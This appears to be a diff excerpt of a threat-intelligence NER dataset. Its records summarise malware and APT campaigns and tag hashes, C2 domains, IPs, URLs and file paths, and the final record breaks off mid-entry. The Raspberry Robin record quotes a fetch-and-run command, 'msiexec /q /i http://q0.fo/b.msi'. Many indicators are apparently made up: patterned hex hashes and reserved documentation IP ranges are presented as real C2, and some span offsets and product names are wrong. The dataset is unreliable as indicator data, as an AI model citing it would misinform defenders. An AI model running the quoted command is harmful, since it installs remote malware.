+ {"text": "Further Latrodectus SHA256 indicators from Proofpoint include 781c63cf4981fa6aff002188307b278fac9785ca66f0b6dfcf68adbe7512e491, aa29a8af8d615b1dd9f52fd49d42563fbeafa35ff0ab1b4afc4cb2b2fa54a119, 0ac5030e2171914f43e0769cb10b602683ccc9da09369bcd4b80da6edb8be80e, 0e96cf6166b7cc279f99d6977ab0f45e9f47e827b8a24d6665ac4c29e18b5ce0, 77270e13d01b2318a3f27a9a477b8386f1a0ebc6d44a2c7e185cfbe55aac8017, and e7ff6a7ac5bfb0bb29547d413591abc7628c7d5576a3b43f6d8e5d95769e553a. Additional samples: dedbc21afc768d749405de535f9b415baaf96f7664ded55d54829a425fc61d7e, 378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05, edeacd49aff3cfea35d593e455f7caca35ac877ad6dc19054458d41021e0e13a, 9c27405cf926d36ed8e247c17e6743ac00912789efe0c530914d7495de1e21ec, and 9a8847168fa869331faf08db71690f24e567c5cdf7f01cc5e2a8d08c93d282c9.", "spans": {"MALWARE: Latrodectus": [[8, 19]], "ORGANIZATION: Proofpoint": [[43, 53]], "HASH: 781c63cf4981fa6aff002188307b278fac9785ca66f0b6dfcf68adbe7512e491": [[62, 126]], "HASH: aa29a8af8d615b1dd9f52fd49d42563fbeafa35ff0ab1b4afc4cb2b2fa54a119": [[128, 192]], "HASH: 0ac5030e2171914f43e0769cb10b602683ccc9da09369bcd4b80da6edb8be80e": [[194, 258]], "HASH: 0e96cf6166b7cc279f99d6977ab0f45e9f47e827b8a24d6665ac4c29e18b5ce0": [[260, 324]], "HASH: 77270e13d01b2318a3f27a9a477b8386f1a0ebc6d44a2c7e185cfbe55aac8017": [[326, 390]], "HASH: e7ff6a7ac5bfb0bb29547d413591abc7628c7d5576a3b43f6d8e5d95769e553a": [[396, 460]], "HASH: dedbc21afc768d749405de535f9b415baaf96f7664ded55d54829a425fc61d7e": [[482, 546]], "HASH: 378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05": [[548, 612]], "HASH: edeacd49aff3cfea35d593e455f7caca35ac877ad6dc19054458d41021e0e13a": [[614, 678]], "HASH: 9c27405cf926d36ed8e247c17e6743ac00912789efe0c530914d7495de1e21ec": [[680, 744]], "HASH: 9a8847168fa869331faf08db71690f24e567c5cdf7f01cc5e2a8d08c93d282c9": [[750, 814]]}, "info": {"id": "malware_00009", "source": "malware_reports"}}
10
+ {"text": "The final batch of Latrodectus SHA256 hashes: 856dfa74e0f3b5b7d6f79491a94560dbf3eacacc4a8d8a3238696fa38a4883ea, 88573297f17589963706d9da6ced7893eacbdc7d6bc43780e4c509b88ccd2aef, 97e08d1c7970c1c12284c4644e2321ce41e40cdaac941e451db4d334cb9c5492, 60c4b6c230a40c80381ce283f64603cac08d3a69ceea91e257c17282f66ceddc, a189963ff252f547fddfc394c81f6e9d49eac403c32154eebe06f4cddb5a2a22, 4416b8c36cb9d7cc261ff6612e105463eb2ccd4681930ca8e277a6387cb98794, 090f2c5abb85a7b115dc25ae070153e4e958ae4e1bc2310226c05cd7e9429446, ee1e5b80a1d3d47c7703ea2b6b64ee96283ab3628ee4fa1fef6d35d1d9051e9f, 3b63ea8b6f9b2aa847faa11f6cd3eb281abd9b9cceedb570713c4d78a47de567, 6904d382bc045eb9a4899a403a8ba8a417d9ccb764f6e0b462bc0232d3b7e7ea, and 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9.", "spans": {"MALWARE: Latrodectus": [[19, 30]], "HASH: 856dfa74e0f3b5b7d6f79491a94560dbf3eacacc4a8d8a3238696fa38a4883ea": [[46, 110]], "HASH: 88573297f17589963706d9da6ced7893eacbdc7d6bc43780e4c509b88ccd2aef": [[112, 176]], "HASH: 97e08d1c7970c1c12284c4644e2321ce41e40cdaac941e451db4d334cb9c5492": [[178, 242]], "HASH: 60c4b6c230a40c80381ce283f64603cac08d3a69ceea91e257c17282f66ceddc": [[244, 308]], "HASH: a189963ff252f547fddfc394c81f6e9d49eac403c32154eebe06f4cddb5a2a22": [[310, 374]], "HASH: 4416b8c36cb9d7cc261ff6612e105463eb2ccd4681930ca8e277a6387cb98794": [[376, 440]], "HASH: 090f2c5abb85a7b115dc25ae070153e4e958ae4e1bc2310226c05cd7e9429446": [[442, 506]], "HASH: ee1e5b80a1d3d47c7703ea2b6b64ee96283ab3628ee4fa1fef6d35d1d9051e9f": [[508, 572]], "HASH: 3b63ea8b6f9b2aa847faa11f6cd3eb281abd9b9cceedb570713c4d78a47de567": [[574, 638]], "HASH: 6904d382bc045eb9a4899a403a8ba8a417d9ccb764f6e0b462bc0232d3b7e7ea": [[640, 704]], "HASH: 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9": [[710, 774]]}, "info": {"id": "malware_00010", "source": "malware_reports"}}
11
+ {"text": "Latrodectus C2 infrastructure identified by Proofpoint includes the following domains: arsimonopa.com, lemonimonakio.com, fluraresto.me, mastralakkot.live, postolwepok.tech, trasenanoyr.best, miistoria.com, plwskoret.top, sluitionsbad.tech, grebiunti.top, zumkoshapsret.com, jertacco.com, popfealt.one, ginzbargatey.tech, minndarespo.icu, drifajizo.fun, and titnovacrion.top. All domains communicate via HTTPS POST requests to the /live/ endpoint.", "spans": {"MALWARE: Latrodectus": [[0, 11]], "ORGANIZATION: Proofpoint": [[44, 54]], "DOMAIN: arsimonopa.com": [[87, 101]], "DOMAIN: lemonimonakio.com": [[103, 120]], "DOMAIN: fluraresto.me": [[122, 135]], "DOMAIN: mastralakkot.live": [[137, 154]], "DOMAIN: postolwepok.tech": [[156, 172]], "DOMAIN: trasenanoyr.best": [[174, 190]], "DOMAIN: miistoria.com": [[192, 205]], "DOMAIN: plwskoret.top": [[207, 220]], "DOMAIN: sluitionsbad.tech": [[222, 239]], "DOMAIN: grebiunti.top": [[241, 254]], "DOMAIN: zumkoshapsret.com": [[256, 273]], "DOMAIN: jertacco.com": [[275, 287]], "DOMAIN: popfealt.one": [[289, 301]], "DOMAIN: ginzbargatey.tech": [[303, 320]], "DOMAIN: minndarespo.icu": [[322, 337]], "DOMAIN: drifajizo.fun": [[339, 352]], "DOMAIN: titnovacrion.top": [[358, 374]]}, "info": {"id": "malware_00011", "source": "malware_reports"}}
12
+ {"text": "Latrodectus payload distribution infrastructure includes the URLs hxxps://hukosafaris.com/elearning/f/q/daas-area/chief/index.php, hxxp://superior-coin.com/ga/index.php, hxxp://superior-coin.com/ga/m/6.dll, and hxxp://sokingscrosshotel.com/share/upd.msi. DanaBot C2 servers associated with Latrodectus campaigns were observed at 77.91.73.187:443 and 74.119.193.200:443. Detection signatures include ET MALWARE Latrodectus Related Activity and ET MALWARE DNS Query to Latrodectus Domains.", "spans": {"MALWARE: Latrodectus": [[0, 11], [290, 301], [410, 421], [467, 478]], "URL: hxxps://hukosafaris.com/elearning/f/q/daas-area/chief/index.php": [[66, 129]], "URL: hxxp://superior-coin.com/ga/index.php": [[131, 168]], "URL: hxxp://superior-coin.com/ga/m/6.dll": [[170, 205]], "URL: hxxp://sokingscrosshotel.com/share/upd.msi": [[211, 253]], "MALWARE: DanaBot": [[255, 262]], "IP_ADDRESS: 77.91.73.187": [[329, 341]], "IP_ADDRESS: 74.119.193.200": [[350, 364]]}, "info": {"id": "malware_00012", "source": "malware_reports"}}
13
+ {"text": "Additional SideWinder C2 domains discovered by Kaspersky include modpak-info.services, pmd-offc.info, dirctt888.com, mods.email, dowmload.co, downl0ad.org, d0wnlaod.org, dirctt88.info, directt88.com, aliyum.email, d0cumentview.info, debcon.live, document-viewer.live, documentviewer.info, ms-office.pro, pncert.info, session-out.com, ziptec.info, depo-govpk.com, crontec.site, mteron.info, mevron.tech, and veorey.live. Additional file hashes: e0bce049c71bc81afe172cd30be4d2b7, 872c2ddf6467b1220ee83dca0e118214, 3d9961991e7ae6ad2bae09c475a1bce8, a694ccdb82b061c26c35f612d68ed1c2, f42ba43f7328cbc9ce85b2482809ff1c, 0216ffc6fb679bdf4ea6ee7051213c1e, and 433480f7d8642076a8b3793948da5efe.", "spans": {"THREAT_ACTOR: SideWinder": [[11, 21]], "ORGANIZATION: Kaspersky": [[47, 56]], "DOMAIN: modpak-info.services": [[65, 85]], "DOMAIN: pmd-offc.info": [[87, 100]], "DOMAIN: dirctt888.com": [[102, 115]], "DOMAIN: mods.email": [[117, 127]], "DOMAIN: dowmload.co": [[129, 140]], "DOMAIN: downl0ad.org": [[142, 154]], "DOMAIN: d0wnlaod.org": [[156, 168]], "DOMAIN: dirctt88.info": [[170, 183]], "DOMAIN: directt88.com": [[185, 198]], "DOMAIN: aliyum.email": [[200, 212]], "DOMAIN: d0cumentview.info": [[214, 231]], "DOMAIN: debcon.live": [[233, 244]], "DOMAIN: document-viewer.live": [[246, 266]], "DOMAIN: documentviewer.info": [[268, 287]], "DOMAIN: ms-office.pro": [[289, 302]], "DOMAIN: pncert.info": [[304, 315]], "DOMAIN: session-out.com": [[317, 332]], "DOMAIN: ziptec.info": [[334, 345]], "DOMAIN: depo-govpk.com": [[347, 361]], "DOMAIN: crontec.site": [[363, 375]], "DOMAIN: mteron.info": [[377, 388]], "DOMAIN: mevron.tech": [[390, 401]], "DOMAIN: veorey.live": [[407, 418]], "HASH: e0bce049c71bc81afe172cd30be4d2b7": [[444, 476]], "HASH: 872c2ddf6467b1220ee83dca0e118214": [[478, 510]], "HASH: 3d9961991e7ae6ad2bae09c475a1bce8": [[512, 544]], "HASH: a694ccdb82b061c26c35f612d68ed1c2": [[546, 578]], "HASH: f42ba43f7328cbc9ce85b2482809ff1c": [[580, 612]], "HASH: 0216ffc6fb679bdf4ea6ee7051213c1e": [[614, 646]], "HASH: 433480f7d8642076a8b3793948da5efe": [[652, 684]]}, "info": {"id": "malware_00013", "source": "malware_reports"}}
14
+ {"text": "Raspberry Robin is a worm that spreads via infected USB drives and has been linked to threat actor DEV-0856. The malware uses msiexec.exe to download payloads from compromised QNAP NAS devices. Observed C2 domains include q0.fo, t1.cx, and v0.cx. The malware drops files to C:\\Users\\Public\\Libraries\\ and C:\\Windows\\Temp\\. Initial infection uses cmd.exe to launch msiexec with URLs like msiexec /q /i http://q0.fo/b.msi. Related hashes include SHA256 7e6a2b21548ee7446c9a3e9ac3e3e93c8b06b110d2a1cea16e976e3be1e758a2 and MD5 4b41e2e5a3f44a95bfe6d0d2b6e0c1d7. The malware has been observed deploying Cobalt Strike, IcedID, and Bumblebee as secondary payloads. It communicates through Tor exit nodes at 185.220.101.34 and 185.220.101.58.", "spans": {"MALWARE: Raspberry Robin": [[0, 15]], "THREAT_ACTOR: DEV-0856": [[99, 107]], "TOOL: msiexec.exe": [[126, 137]], "SYSTEM: QNAP": [[176, 180]], "DOMAIN: q0.fo": [[222, 227], [408, 413]], "DOMAIN: t1.cx": [[229, 234]], "DOMAIN: v0.cx": [[240, 245]], "FILEPATH: C:\\Users\\Public\\Libraries\\": [[274, 300]], "FILEPATH: C:\\Windows\\Temp\\": [[305, 321]], "TOOL: cmd.exe": [[346, 353]], "URL: http://q0.fo/b.msi": [[401, 419]], "HASH: 7e6a2b21548ee7446c9a3e9ac3e3e93c8b06b110d2a1cea16e976e3be1e758a2": [[451, 515]], "HASH: 4b41e2e5a3f44a95bfe6d0d2b6e0c1d7": [[524, 556]], "MALWARE: Cobalt Strike": [[598, 611]], "MALWARE: IcedID": [[613, 619]], "MALWARE: Bumblebee": [[625, 634]], "IP_ADDRESS: 185.220.101.34": [[700, 714]], "IP_ADDRESS: 185.220.101.58": [[719, 733]]}, "info": {"id": "malware_00014", "source": "malware_reports"}}
15
+ {"text": "ESET researchers discovered DynoWiper, a destructive wiper malware targeting Poland's energy sector. The malware overwrites the Master Boot Record and encrypts files with the extensions .doc, .xls, .pdf, .pptx, and .sql. The wiper binary had SHA256 hash a3c2f8b71e4d6f9e0c5a7b8d2e1f3c4a5b6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f and was delivered via spear-phishing emails impersonating the Polish energy regulator URE. The malware was executed from C:\\Windows\\System32\\svchost_update.exe and communicated with C2 server at 91.234.56.78. The dropper connected to download.energy-update.com to retrieve secondary payloads. The attack also leveraged PowerShell scripts stored at C:\\ProgramData\\Microsoft\\Updates\\sync.ps1 and used certutil to decode base64-encoded payloads.", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: DynoWiper": [[28, 37]], "HASH: a3c2f8b71e4d6f9e0c5a7b8d2e1f3c4a5b6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f": [[254, 318]], "ORGANIZATION: URE": [[405, 408]], "FILEPATH: C:\\Windows\\System32\\svchost_update.exe": [[440, 478]], "IP_ADDRESS: 91.234.56.78": [[514, 526]], "DOMAIN: download.energy-update.com": [[553, 579]], "TOOL: PowerShell": [[638, 648]], "FILEPATH: C:\\ProgramData\\Microsoft\\Updates\\sync.ps1": [[667, 708]], "TOOL: certutil": [[718, 726]]}, "info": {"id": "malware_00015", "source": "malware_reports"}}
16
+ {"text": "APT29, also known as Cozy Bear and tracked by Microsoft as Midnight Blizzard, conducted a phishing campaign targeting European diplomatic entities in Q1 2025. The group distributed malicious ISO files containing a shortcut file that executed a DLL payload via rundll32.exe. The DLL with SHA256 hash f1e2d3c4b5a6978089a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2 was loaded from C:\\Users\\Public\\Documents\\config.dll. C2 communications were directed to auth-microsoft365.com and login-sharepoint.org over HTTPS port 443. The phishing emails were sent from compromised accounts at legitimate organizations and contained links to hxxps://auth-microsoft365.com/oauth/v2/authorize?client_id=payload. Secondary C2 infrastructure was hosted at 194.58.112.43 and 89.34.27.199. The group also deployed Brute Ratel C4 from C:\\Users\\AppData\\Local\\Temp\\RuntimeBroker.exe.", "spans": {"THREAT_ACTOR: APT29": [[0, 5]], "THREAT_ACTOR: Cozy Bear": [[21, 30]], "THREAT_ACTOR: Midnight Blizzard": [[59, 76]], "ORGANIZATION: Microsoft": [[46, 55]], "TOOL: rundll32.exe": [[260, 272]], "HASH: f1e2d3c4b5a6978089a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2": [[299, 363]], "FILEPATH: C:\\Users\\Public\\Documents\\config.dll": [[380, 416]], "DOMAIN: auth-microsoft365.com": [[453, 474], [636, 657]], "DOMAIN: login-sharepoint.org": [[479, 499]], "URL: hxxps://auth-microsoft365.com/oauth/v2/authorize?client_id=payload": [[628, 694]], "IP_ADDRESS: 194.58.112.43": [[738, 751]], "IP_ADDRESS: 89.34.27.199": [[756, 768]], "MALWARE: Brute Ratel C4": [[794, 808]], "FILEPATH: C:\\Users\\AppData\\Local\\Temp\\RuntimeBroker.exe": [[814, 859]]}, "info": {"id": "malware_00016", "source": "malware_reports"}}
17
+ {"text": "The Medusa ransomware group emerged in 2023 and operates a ransomware-as-a-service model. CISA released advisory AA25-071A documenting Medusa's tactics. The ransomware binary typically has filename gaze.exe or medusa_locker.exe and is deployed after initial access via exposed RDP services or phishing. Medusa uses the legitimate tool PsExec for lateral movement and deploys Advanced IP Scanner for network reconnaissance. The ransomware appends the .MEDUSA extension to encrypted files and drops a ransom note named !!!READ_ME_MEDUSA!!!.txt. Known C2 infrastructure includes the domains medusaxko7jxtrojdkr4rgak5mhobzntokrjip2c7bkc22aw2jsidid.onion and medusa-blog.xyz. Observed IP addresses used for data exfiltration: 45.8.146.23, 193.233.133.58, and 91.92.242.87. File hashes associated with Medusa include SHA256 c6a3b3e5d2a1f4c8b7e9d0a2f3c4b5a6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2 and MD5 b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7.", "spans": {"MALWARE: Medusa": [[4, 10], [135, 141], [303, 309], [796, 802]], "ORGANIZATION: CISA": [[90, 94]], "FILEPATH: gaze.exe": [[198, 206]], "FILEPATH: medusa_locker.exe": [[210, 227]], "TOOL: PsExec": [[335, 341]], "TOOL: Advanced IP Scanner": [[375, 394]], "FILEPATH: !!!READ_ME_MEDUSA!!!.txt": [[517, 541]], "DOMAIN: medusaxko7jxtrojdkr4rgak5mhobzntokrjip2c7bkc22aw2jsidid.onion": [[588, 649]], "DOMAIN: medusa-blog.xyz": [[654, 669]], "IP_ADDRESS: 45.8.146.23": [[721, 732]], "IP_ADDRESS: 193.233.133.58": [[734, 748]], "IP_ADDRESS: 91.92.242.87": [[754, 766]], "HASH: c6a3b3e5d2a1f4c8b7e9d0a2f3c4b5a6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2": [[818, 882]], "HASH: b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7": [[891, 923]]}, "info": {"id": "malware_00017", "source": "malware_reports"}}
18
+ {"text": "Despite the FBI takedown in August 2023, QakBot (also known as Qbot and Pinkslipbot) resurfaced in late 2024 with updated infrastructure. The new variant with SHA256 hash 8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b communicates with C2 servers at 203.0.113.42, 198.51.100.73, and 192.0.2.156. The malware is delivered through malicious OneNote files that execute PowerShell commands to download the payload from hxxp://203.0.113.42/updates/kb5034441.dll. QakBot creates persistence via a scheduled task and drops its main DLL to C:\\Users\\AppData\\Roaming\\Microsoft\\{GUID}\\qbot.dll. The malware performs process injection into wermgr.exe and explorer.exe for evasion. Additional C2 domains include update-service-ms.com and cdn-office365.net. Associated email addresses used in phishing: invoice@update-service-ms.com and admin@cdn-office365.net.", "spans": {"MALWARE: QakBot": [[41, 47], [476, 482]], "MALWARE: Qbot": [[63, 67]], "MALWARE: Pinkslipbot": [[72, 83]], "ORGANIZATION: FBI": [[12, 15]], "HASH: 8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b": [[171, 235]], "IP_ADDRESS: 203.0.113.42": [[268, 280], [440, 452]], "IP_ADDRESS: 198.51.100.73": [[282, 295]], "IP_ADDRESS: 192.0.2.156": [[301, 312]], "SYSTEM: OneNote": [[357, 364]], "TOOL: PowerShell": [[384, 394]], "URL: hxxp://203.0.113.42/updates/kb5034441.dll": [[433, 474]], "FILEPATH: C:\\Users\\AppData\\Roaming\\Microsoft\\{GUID}\\qbot.dll": [[550, 600]], "SYSTEM: wermgr.exe": [[646, 656]], "SYSTEM: explorer.exe": [[661, 673]], "DOMAIN: update-service-ms.com": [[717, 738], [815, 836]], "DOMAIN: cdn-office365.net": [[743, 760], [847, 864]], "EMAIL: invoice@update-service-ms.com": [[807, 836]], "EMAIL: admin@cdn-office365.net": [[841, 864]]}, "info": {"id": "malware_00018", "source": "malware_reports"}}
19
+ {"text": "The BlackCat ransomware, also tracked as ALPHV, deployed a new variant in 2024 targeting VMware ESXi hypervisors. The Linux variant with SHA1 hash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b was designed to encrypt virtual machine disk files on ESXi hosts. The attack began with exploitation of CVE-2024-37085 in VMware ESXi to gain administrative access. The threat actor used SSH to connect to ESXi hosts from 172.16.45.3 and uploaded the ransomware to /tmp/esxi_encrypt. The ransomware configuration was stored at /tmp/.config.json. Exfiltration of sensitive data occurred via rclone to Mega cloud storage, with traffic routed through 185.174.137.92. Additional SHA256 hashes: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5 and a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1. C2 communications used the domain alphv-paymentsite.onion.", "spans": {"MALWARE: BlackCat": [[4, 12]], "MALWARE: ALPHV": [[41, 46]], "SYSTEM: VMware ESXi": [[89, 100], [310, 321]], "HASH: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b": [[147, 187], [769, 809]], "CVE_ID: CVE-2024-37085": [[292, 306]], "IP_ADDRESS: 172.16.45.3": [[409, 420]], "FILEPATH: /tmp/esxi_encrypt": [[452, 469]], "FILEPATH: /tmp/.config.json": [[514, 531]], "TOOL: rclone": [[577, 583]], "IP_ADDRESS: 185.174.137.92": [[635, 649]], "HASH: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5": [[677, 741]], "HASH: a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1": [[746, 810]], "DOMAIN: alphv-paymentsite.onion": [[846, 869]]}, "info": {"id": "malware_00019", "source": "malware_reports"}}
20
+ {"text": "Lazarus Group, also known as Hidden Cobra and attributed to North Korea's RGB, conducted the TraderTraitor campaign targeting cryptocurrency firms. The FBI and CISA published a joint advisory documenting the attacks. The group distributed trojanized cryptocurrency trading applications with SHA256 hashes e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6 and b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0. The applications connected to C2 infrastructure at api-trader.chainfund.io and exchange-data.cryptonode.org on port 8443. Malicious payloads were hosted at hxxps://api-trader.chainfund.io/v2/update/electron.asar. The backdoor was installed to /Library/Application Support/.daemon/updater and ~/Library/LaunchAgents/com.apple.update.plist on macOS targets. C2 IP addresses included 104.168.174.22 and 107.189.10.143. The group also used social engineering via LinkedIn, sending messages from accounts like recruit@hrnodes.io.", "spans": {"THREAT_ACTOR: Lazarus Group": [[0, 13]], "THREAT_ACTOR: Hidden Cobra": [[29, 41]], "ORGANIZATION: FBI": [[152, 155]], "ORGANIZATION: CISA": [[160, 164]], "HASH: e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6": [[305, 369]], "HASH: b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0": [[374, 438]], "DOMAIN: api-trader.chainfund.io": [[491, 514], [604, 627]], "DOMAIN: exchange-data.cryptonode.org": [[519, 547]], "URL: hxxps://api-trader.chainfund.io/v2/update/electron.asar": [[596, 651]], "FILEPATH: /Library/Application Support/.daemon/updater": [[683, 727]], "FILEPATH: ~/Library/LaunchAgents/com.apple.update.plist": [[732, 777]], "IP_ADDRESS: 104.168.174.22": [[821, 835]], "IP_ADDRESS: 107.189.10.143": [[840, 854]], "EMAIL: recruit@hrnodes.io": [[945, 963]], "SYSTEM: macOS": [[781, 786]], "SYSTEM: LinkedIn": [[899, 907]]}, "info": {"id": "malware_00020", "source": "malware_reports"}}
21
+ {"text": "Volt Typhoon, a Chinese state-sponsored threat actor, targeted U.S. critical infrastructure using living-off-the-land techniques. Microsoft and the Five Eyes intelligence alliance published advisories. The group gained initial access through Fortinet FortiGuard devices exploiting CVE-2024-21762. Post-compromise activity relied on netsh, ntdsutil, PowerShell, and wmic for discovery and credential access. The attackers used compromised SOHO routers at IP addresses 24.199.247.13, 67.230.163.214, and 162.245.191.78 as operational relay infrastructure. Web shells were deployed to C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\error.aspx. Lateral movement used PsExec and Windows Management Instrumentation. Exfiltrated data was staged at C:\\Windows\\Temp\\cab_extract\\ before transfer. No custom malware was deployed; the group relied entirely on built-in Windows tools including cmd.exe, certutil, and bitsadmin.", "spans": {"THREAT_ACTOR: Volt Typhoon": [[0, 12]], "ORGANIZATION: Microsoft": [[130, 139]], "SYSTEM: Fortinet FortiGuard": [[242, 261]], "CVE_ID: CVE-2024-21762": [[281, 295]], "TOOL: netsh": [[332, 337]], "TOOL: ntdsutil": [[339, 347]], "TOOL: PowerShell": [[349, 359]], "TOOL: wmic": [[365, 369]], "IP_ADDRESS: 24.199.247.13": [[467, 480]], "IP_ADDRESS: 67.230.163.214": [[482, 496]], "IP_ADDRESS: 162.245.191.78": [[502, 516]], "FILEPATH: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\error.aspx": [[582, 636]], "TOOL: PsExec": [[660, 666]], "FILEPATH: C:\\Windows\\Temp\\cab_extract\\": [[738, 766]], "TOOL: cmd.exe": [[878, 885]], "TOOL: certutil": [[887, 895]], "TOOL: bitsadmin": [[901, 910]], "SYSTEM: Windows": [[671, 678], [741, 748], [854, 861]]}, "info": {"id": "malware_00021", "source": "malware_reports"}}
22
+ {"text": "Sandworm, attributed to Russia's GRU Unit 74455 and tracked by Microsoft as Seashell Blizzard, deployed destructive malware against Ukrainian energy infrastructure. The group used Industroyer2 to target industrial control systems at substations, alongside CaddyWiper (SHA256 a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7) to destroy data on Windows systems. The attack was coordinated with OrcShred wiper for Linux and Solaris targets with hash c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9. C2 infrastructure was hosted at 91.245.228.56 and 176.57.215.92. Malicious scripts were deployed to /var/tmp/.update.sh and /opt/oracle/extproc.sh. The Industroyer2 configuration targeted IEC-104 protocol on ports 2404 and contained hardcoded IP addresses of substation RTUs at 10.25.100.1 and 10.25.100.2.", "spans": {"THREAT_ACTOR: Sandworm": [[0, 8]], "ORGANIZATION: GRU": [[33, 36]], "THREAT_ACTOR: Seashell Blizzard": [[76, 93]], "ORGANIZATION: Microsoft": [[63, 72]], "MALWARE: Industroyer2": [[180, 192], [682, 694]], "MALWARE: CaddyWiper": [[256, 266]], "HASH: a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7": [[275, 339]], "SYSTEM: Windows": [[360, 367]], "MALWARE: OrcShred": [[409, 417]], "SYSTEM: Linux": [[428, 433]], "SYSTEM: Solaris": [[438, 445]], "HASH: c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9": [[464, 528]], "IP_ADDRESS: 91.245.228.56": [[562, 575]], "IP_ADDRESS: 176.57.215.92": [[580, 593]], "FILEPATH: /var/tmp/.update.sh": [[630, 649]], "FILEPATH: /opt/oracle/extproc.sh": [[654, 676]], "IP_ADDRESS: 10.25.100.1": [[808, 819]], "IP_ADDRESS: 10.25.100.2": [[824, 835]]}, "info": {"id": "malware_00022", "source": "malware_reports"}}
23
+ {"text": "FIN7, also known as Carbanak Group and ITG14, targeted the U.S. hospitality and retail sectors with novel malware. The group sent phishing emails with malicious DOCX attachments exploiting CVE-2023-36884 in Microsoft Office. The payload, a JScript backdoor named Lizar, was dropped to C:\\Users\\AppData\\Local\\Temp\\WinUpdate.js and beaconed to the C2 domain cdn-static-updates.com at IP 185.219.52.229. Additional C2 domains: api-gateway-service.com and storage-cloud-backup.net. The group also deployed Carbanak backdoor (SHA256 d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2) and used BloodHound for Active Directory reconnaissance. Cobalt Strike beacons connected to 45.129.14.88 and 91.195.240.117. The Lizar implant communicated over DNS TXT records to evade network detection.", "spans": {"THREAT_ACTOR: FIN7": [[0, 4]], "THREAT_ACTOR: Carbanak Group": [[20, 34]], "CVE_ID: CVE-2023-36884": [[189, 203]], "SYSTEM: Microsoft Office": [[207, 223]], "MALWARE: Lizar": [[263, 268], [723, 728]], "FILEPATH: C:\\Users\\AppData\\Local\\Temp\\WinUpdate.js": [[285, 325]], "DOMAIN: cdn-static-updates.com": [[356, 378]], "IP_ADDRESS: 185.219.52.229": [[385, 399]], "DOMAIN: api-gateway-service.com": [[424, 447]], "DOMAIN: storage-cloud-backup.net": [[452, 476]], "MALWARE: Carbanak": [[20, 28], [502, 510]], "HASH: d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2": [[528, 592]], "TOOL: BloodHound": [[603, 613]], "MALWARE: Cobalt Strike": [[651, 664]], "IP_ADDRESS: 45.129.14.88": [[686, 698]], "IP_ADDRESS: 91.195.240.117": [[703, 717]]}, "info": {"id": "malware_00023", "source": "malware_reports"}}
24
+ {"text": "Akira ransomware emerged in March 2023 and has targeted over 250 organizations globally. The ransomware group maintains a Tor-based leak site at akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id.onion. Initial access is commonly gained through Cisco VPN appliances exploiting CVE-2023-20269. The ransomware binary (SHA256 hash f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4d5e6f7a8b9c0d1e2f3) encrypts files with the .akira extension. The group uses AnyDesk and RustDesk for remote access, WinSCP for data exfiltration, and Mimikatz for credential dumping. Ransomware deployment scripts are staged at C:\\Windows\\Temp\\deploy.bat and network shares are encrypted via C:\\Users\\Public\\w.exe. C2 IP addresses: 89.105.198.42, 194.26.135.119, and 45.227.255.13. Exfiltrated data is uploaded to mega.nz and transferred via rclone. The decryptor for paying victims is hosted at hxxps://akiradecrypt.org/recover/index.html.", "spans": {"MALWARE: Akira": [[0, 5]], "DOMAIN: akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id.onion": [[145, 207]], "SYSTEM: Cisco VPN": [[251, 260]], "CVE_ID: CVE-2023-20269": [[283, 297]], "HASH: f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4d5e6f7a8b9c0d1e2f3": [[334, 398]], "TOOL: AnyDesk": [[457, 464]], "TOOL: RustDesk": [[469, 477]], "TOOL: WinSCP": [[497, 503]], 